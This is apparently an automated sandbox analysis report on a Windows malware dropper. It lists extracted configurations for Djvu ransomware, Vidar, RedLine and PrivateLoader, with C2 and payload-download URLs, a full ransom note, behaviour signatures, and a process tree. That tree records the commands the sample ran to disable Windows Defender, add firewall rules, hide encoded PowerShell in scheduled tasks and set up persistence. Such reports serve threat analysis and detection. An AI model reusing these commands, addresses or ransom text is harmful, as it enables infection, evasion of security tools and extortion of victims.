Analysis

  • max time kernel
    450s
  • max time network
    453s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    05-07-2022 10:59

General

  • Target

    faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe

  • Size

    732KB

  • MD5

    659ac9c3f3c0fffb292704cb5e7dd699

  • SHA1

    a3ee2528280cd762c130f680af08583df22bb435

  • SHA256

    faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd

  • SHA512

    0b99ae205eb06e39f0befef1c41776cbddda78e674c639eb51968bba4b70aad45cc7b0dbf4ad9bed12a7a82ac31943185b8f59aab082afb15d9b91924889db10

Malware Config

Extracted

Family

privateloader

C2

Attributes
  • payload_url

Extracted

Family

djvu

C2

http://acacaca.org/test3/get.php

Attributes
  • extension

    .eiur

  • offline_id

    JPKXWc5eWNjIicWmQyJxv6NCjbH02qrKi0af9Zt1

  • payload_url

    http://rgyui.top/dl/build2.exe

    http://acacaca.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-aMsnHoiJcO Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0510Usjdjs

rsa_pubkey.plain

Extracted

Family

vidar

Version

53.1

Botnet

1448

C2

https://t.me/tg_dailyrunnings

https://mastodon.online/@olegf9844g

Attributes
  • profile_id

    1448

Extracted

Family

vidar

Version

53

Botnet

937

C2

https://t.me/ch_inagroup

https://mastodon.social/@olegf9844e

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

Lyla28.06

C2

185.215.113.16:21921

Attributes
  • auth_value

    de24aa7fc89cb989c29bc8e2697f6d2a

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Colibri Loader

    A loader sold as MaaS first seen in August 2021.

  • Detected Djvu ransomware 10 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 14 IoCs
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Modifies visibility of hidden/system files in Explorer 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Amadey CnC Check-In
  • suricata: ET MALWARE Generic gate .php GET with minimal headers
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
  • suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
  • suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
  • suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
  • suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
  • suricata: ET MALWARE Win32/Colibri Loader Activity
  • suricata: ET MALWARE Win32/Colibri Loader Activity M2
  • suricata: ET MALWARE Win32/Colibri Loader Activity M3
  • suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
  • suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
  • suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
  • Vidar Stealer 6 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 23 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 13 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 19 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Detects Pyinstaller 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 29 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 7 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
    "C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3620
    • C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
      "C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • Checks computer location settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4196
      • C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
        "C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        PID:3704
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
          4⤵
            PID:968
          • C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
            "C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"
            4⤵
            • Executes dropped EXE
            PID:3516
        • C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe
          "C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe"
          3⤵
          • Executes dropped EXE
          • Drops file in Program Files directory
          PID:4436
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
            4⤵
            • Creates scheduled task(s)
            PID:4212
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
            4⤵
            • Creates scheduled task(s)
            PID:3112
          • C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe
            "C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe"
            4⤵
            • Modifies Windows Defender Real-time Protection settings
            • Executes dropped EXE
            • Checks computer location settings
            PID:1808
            • C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe
              "C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe"
              5⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:968
              • C:\Windows\SysWOW64\control.exe
                "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                6⤵
                  PID:4596
                  • C:\Windows\SysWOW64\rundll32.exe
                    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                    7⤵
                    • Loads dropped DLL
                    PID:5532
                    • C:\Windows\system32\RunDll32.exe
                      C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                      8⤵
                      • Blocklisted process makes network request
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4688
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                        9⤵
                        • Loads dropped DLL
                        PID:6036
              • C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
                "C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe"
                5⤵
                • Executes dropped EXE
                • Checks computer location settings
                PID:3608
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 452
                  6⤵
                  • Program crash
                  PID:4292
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 776
                  6⤵
                  • Program crash
                  PID:1044
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 784
                  6⤵
                  • Program crash
                  PID:4436
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 784
                  6⤵
                  • Program crash
                  PID:2596
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 824
                  6⤵
                  • Program crash
                  PID:3240
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 984
                  6⤵
                  • Program crash
                  PID:6112
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 1012
                  6⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:5348
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 1364
                  6⤵
                  • Program crash
                  PID:3224
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im "Ju38t3w5U8IOhBMX5rcSC6Nn.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe" & exit
                  6⤵
                    PID:4128
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im "Ju38t3w5U8IOhBMX5rcSC6Nn.exe" /f
                      7⤵
                      • Kills process with taskkill
                      PID:2176
                • C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe
                  "C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:5436
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 5436 -s 708
                    6⤵
                    • Program crash
                    PID:6044
                • C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe
                  "C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:5408
                  • C:\Users\Admin\AppData\Local\Temp\7zSDD85.tmp\Install.exe
                    .\Install.exe
                    6⤵
                    • Executes dropped EXE
                    PID:4192
                    • C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe
                      .\Install.exe /S /site_id "525403"
                      7⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks computer location settings
                      • Drops file in System32 directory
                      • Enumerates system info in registry
                      PID:2200
                      • C:\Windows\SysWOW64\forfiles.exe
                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                        8⤵
                          PID:6100
                          • C:\Windows\SysWOW64\cmd.exe
                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                            9⤵
                              PID:4200
                              • \??\c:\windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                10⤵
                                  PID:4688
                                • \??\c:\windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                  10⤵
                                    PID:1824
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                8⤵
                                  PID:3464
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                    9⤵
                                      PID:2440
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                        10⤵
                                          PID:4984
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                          10⤵
                                            PID:3976
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /CREATE /TN "gHbFtyKwQ" /SC once /ST 00:21:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                        8⤵
                                        • Creates scheduled task(s)
                                        PID:5364
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /run /I /tn "gHbFtyKwQ"
                                        8⤵
                                          PID:5840
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            9⤵
                                            • Loads dropped DLL
                                            PID:5044
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /DELETE /F /TN "gHbFtyKwQ"
                                          8⤵
                                            PID:2496
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /CREATE /TN "bamNpdvhtkzLwlCraC" /SC once /ST 13:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe\" bH /site_id 525403 /S" /V1 /F
                                            8⤵
                                            • Drops file in Windows directory
                                            • Creates scheduled task(s)
                                            PID:1712
                                    • C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      • Suspicious use of SetWindowsHookEx
                                      PID:5396
                                      • C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe" H
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:5996
                                    • C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      PID:5344
                                      • C:\Windows\SysWOW64\attrib.exe
                                        attrib -?
                                        6⤵
                                        • Views/modifies file attributes
                                        PID:5628
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c cmd < Inebriarti.htm & ping -n 5 localhost
                                        6⤵
                                          PID:5452
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd
                                            7⤵
                                              PID:3092
                                              • C:\Windows\SysWOW64\tasklist.exe
                                                tasklist /FI "imagename eq PSUAService.exe"
                                                8⤵
                                                • Enumerates processes with tasklist
                                                PID:109220
                                              • C:\Windows\SysWOW64\find.exe
                                                find /I /N "psuaservice.exe"
                                                8⤵
                                                  PID:109248
                                                • C:\Windows\SysWOW64\findstr.exe
                                                  findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm
                                                  8⤵
                                                    PID:109280
                                                  • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif
                                                    Tal.exe.pif H
                                                    8⤵
                                                    • Loads dropped DLL
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:109296
                                                    • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif
                                                      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif
                                                      9⤵
                                                        PID:1164
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1164 -s 12
                                                          10⤵
                                                          • Program crash
                                                          PID:6312
                                                    • C:\Windows\SysWOW64\PING.EXE
                                                      ping localhost -n 5
                                                      8⤵
                                                      • Runs ping.exe
                                                      PID:109316
                                                  • C:\Windows\SysWOW64\PING.EXE
                                                    ping -n 5 localhost
                                                    7⤵
                                                    • Runs ping.exe
                                                    PID:109464
                                          • C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe
                                            "C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            PID:4052
                                            • C:\Windows\SysWOW64\control.exe
                                              "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                                              4⤵
                                                PID:4216
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                                                  5⤵
                                                    PID:5044
                                                    • C:\Windows\system32\RunDll32.exe
                                                      C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                                                      6⤵
                                                        PID:6072
                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                          "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
                                                          7⤵
                                                          • Loads dropped DLL
                                                          PID:5156
                                                • C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1744
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 2068
                                                    4⤵
                                                    • Program crash
                                                    PID:6016
                                                • C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2948
                                                • C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:1624
                                                  • C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    • Drops file in Windows directory
                                                    • Modifies data under HKEY_USERS
                                                    PID:3284
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                      5⤵
                                                        PID:2480
                                                        • C:\Windows\system32\netsh.exe
                                                          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                          6⤵
                                                          • Modifies Windows Firewall
                                                          PID:2272
                                                      • C:\Windows\rss\csrss.exe
                                                        C:\Windows\rss\csrss.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        PID:4588
                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                          6⤵
                                                          • Creates scheduled task(s)
                                                          PID:5940
                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                          schtasks /delete /tn ScheduledUpdate /f
                                                          6⤵
                                                            PID:5732
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              7⤵
                                                                PID:5628
                                                            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                              C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:796
                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                              6⤵
                                                              • Creates scheduled task(s)
                                                              PID:3144
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                              6⤵
                                                                PID:4904
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                  7⤵
                                                                  • Launches sc.exe
                                                                  PID:5780
                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
                                                                C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
                                                                6⤵
                                                                  PID:2892
                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                    schtasks /delete /tn "csrss" /f
                                                                    7⤵
                                                                      PID:6424
                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                      schtasks /delete /tn "ScheduledUpdate" /f
                                                                      7⤵
                                                                        PID:6476
                                                              • C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe
                                                                "C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Checks computer location settings
                                                                • Loads dropped DLL
                                                                • Checks processor information in registry
                                                                PID:2284
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im l2S7FrWODIlvtiOh9PM4XNlS.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe" & del C:\ProgramData\*.dll & exit
                                                                  4⤵
                                                                    PID:5340
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /im l2S7FrWODIlvtiOh9PM4XNlS.exe /f
                                                                      5⤵
                                                                      • Kills process with taskkill
                                                                      PID:5628
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /t 6
                                                                      5⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:6052
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 1556
                                                                    4⤵
                                                                    • Program crash
                                                                    PID:5440
                                                                • C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Adds Run key to start application
